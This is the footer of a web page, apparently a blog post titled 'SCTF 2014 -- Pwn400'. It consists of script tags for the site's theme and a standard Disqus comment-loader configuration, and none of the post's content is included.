  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  

    
      <script id="dsq-count-scr" src="https://bruce30262logdown.disqus.com/count.js" async></script>
    

    
      <script type="text/javascript">
        var disqus_config = function () {
          this.page.url = 'https://bruce30262.github.io/2014/12/08/2014-12-08-sctf-2014-pwn400/';
          this.page.identifier = '2014/12/08/2014-12-08-sctf-2014-pwn400/';
          this.page.title = 'SCTF 2014 -- Pwn400';
        };
        var d = document, s = d.createElement('script');
        s.src = 'https://bruce30262logdown.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      </script>
    

  













  





  

  

  

  

  

</body>
</html>
